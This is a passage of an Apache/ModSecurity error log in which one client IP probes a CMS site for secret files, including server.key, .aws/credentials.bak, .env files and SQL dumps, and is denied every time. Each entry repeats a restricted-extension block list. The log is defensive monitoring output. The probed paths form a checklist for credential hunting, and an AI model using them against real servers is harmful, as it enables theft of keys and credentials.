[rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aZ3Rfzuzcxjz9L27429GTAAAAQY"] [Tue Feb 24 18:27:44.112640 2026] [:error] [pid 23863:tid 23961] [client 185.177.72.22:54630] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/server.key"] [unique_id "aZ3RgEQ2N2H_02JlNwJJggAAAJA"] [Tue Feb 24 18:27:44.510350 2026] [:error] [pid 10294:tid 10388] [client 185.177.72.22:54640] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aZ3RgDuzcxjz9L27429GYAAAARY"] [Tue Feb 24 18:27:44.568976 2026] [:error] [pid 10294:tid 10346] [client 185.177.72.22:54646] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/php5.ini"] [unique_id "aZ3RgDuzcxjz9L27429GZgAAAQA"] [Tue Feb 24 18:27:44.892625 2026] [:error] [pid 24013:tid 24015] [client 185.177.72.22:54658] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/server.key"] [unique_id "aZ3RgFula2tjaLQkqxInugAAAMA"] [Tue Feb 24 18:27:45.393309 2026] [:error] [pid 10294:tid 10376] [client 185.177.72.22:19510] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php5.ini"] [unique_id "aZ3RgTuzcxjz9L27429GfAAAAQs"] [Tue Feb 24 18:27:49.720361 2026] [:error] [pid 24013:tid 24037] [client 185.177.72.22:19842] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aZ3RhVula2tjaLQkqxIn2AAAANY"] [Tue Feb 24 18:27:50.246507 2026] [:error] [pid 10294:tid 10378] [client 185.177.72.22:19860] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.aws/credentials.bak"] [unique_id "aZ3Rhjuzcxjz9L27429HPwAAAQ0"] [Tue Feb 24 18:27:50.438350 2026] [:error] [pid 23863:tid 23948] [client 185.177.72.22:19874] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aZ3RhkQ2N2H_02JlNwJJxwAAAIk"] [Tue Feb 24 18:27:50.897012 2026] [:error] [pid 10294:tid 10381] [client 185.177.72.22:19910] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.aws/credentials.bak"] [unique_id "aZ3Rhjuzcxjz9L27429HbgAAARA"] [Tue Feb 24 18:27:51.244649 2026] [:error] [pid 10294:tid 10366] [client 185.177.72.22:19914] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.bak"] [unique_id "aZ3Rhzuzcxjz9L27429HggAAAQc"] [Tue Feb 24 18:27:51.940358 2026] [:error] [pid 10294:tid 10364] [client 185.177.72.22:19972] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.bak"] [unique_id "aZ3Rhzuzcxjz9L27429HogAAAQU"] [Tue Feb 24 18:28:08.655236 2026] [authz_core:error] [pid 10294:tid 10380] [client 185.177.72.22:8384] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/.htaccess [Tue Feb 24 18:28:08.960219 2026] [authz_core:error] [pid 10294:tid 10371] [client 185.177.72.22:8394] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/.htaccess [Tue Feb 24 18:29:52.695400 2026] [access_compat:error] [pid 10294:tid 10382] [client 185.177.72.22:54818] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Tue Feb 24 18:29:52.705340 2026] [access_compat:error] [pid 10294:tid 10388] [client 185.177.72.22:54818] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Tue Feb 24 18:29:52.717410 2026] [access_compat:error] [pid 10294:tid 10348] [client 185.177.72.22:54818] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/persistence [Tue Feb 24 18:29:52.744413 2026] [access_compat:error] [pid 10294:tid 10362] [client 185.177.72.22:54818] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/src [Tue Feb 24 18:29:52.993795 2026] [access_compat:error] [pid 23861:tid 23925] [client 185.177.72.22:54838] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/app/.env [Tue Feb 24 18:29:53.007264 2026] [access_compat:error] [pid 23861:tid 23939] [client 185.177.72.22:54838] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/Datavase [Tue Feb 24 18:29:53.013871 2026] [access_compat:error] [pid 23861:tid 23951] [client 185.177.72.22:54838] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/persistence [Tue Feb 24 18:29:53.023501 2026] [access_compat:error] [pid 23861:tid 23933] [client 185.177.72.22:54838] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/src [Tue Feb 24 18:29:59.970043 2026] [:error] [pid 23860:tid 23916] [client 185.177.72.22:40166] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aZ3SB5BWPCzoVu8DXHafuQAAABM"] [Tue Feb 24 18:29:59.977384 2026] [:error] [pid 23860:tid 23921] [client 185.177.72.22:40166] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aZ3SB5BWPCzoVu8DXHafugAAABg"] [Tue Feb 24 18:30:00.240474 2026] [:error] [pid 24013:tid 24028] [client 185.177.72.22:40174] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aZ3SCFula2tjaLQkqxIvIAAAAM0"] [Tue Feb 24 18:30:00.248391 2026] [:error] [pid 24013:tid 24019] [client 185.177.72.22:40174] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aZ3SCFula2tjaLQkqxIvIQAAAMQ"] [Tue Feb 24 18:30:00.733339 2026] [:error] [pid 23863:tid 23932] [client 185.177.72.22:40220] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aZ3SCEQ2N2H_02JlNwJOIAAAAIE"] [Tue Feb 24 18:30:01.064782 2026] [:error] [pid 23863:tid 23954] [client 185.177.72.22:40224] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/debug.log"] [unique_id "aZ3SCUQ2N2H_02JlNwJOJAAAAIw"] [Tue Feb 24 18:30:20.093707 2026] [:error] [pid 23860:tid 23912] [client 185.177.72.22:40384] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aZ3SHJBWPCzoVu8DXHaf8AAAAA8"] [Tue Feb 24 18:30:20.419558 2026] [:error] [pid 23863:tid 23971] [client 185.177.72.22:40396] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aZ3SHEQ2N2H_02JlNwJOywAAAJY"] [Tue Feb 24 18:30:24.854367 2026] [:error] [pid 24013:tid 24033] [client 185.177.72.22:40618] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aZ3SIFula2tjaLQkqxIxPwAAANI"] [Tue Feb 24 18:30:25.151122 2026] [:error] [pid 24013:tid 24015] [client 185.177.72.22:40632] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aZ3SIVula2tjaLQkqxIxRgAAAMA"] [Tue Feb 24 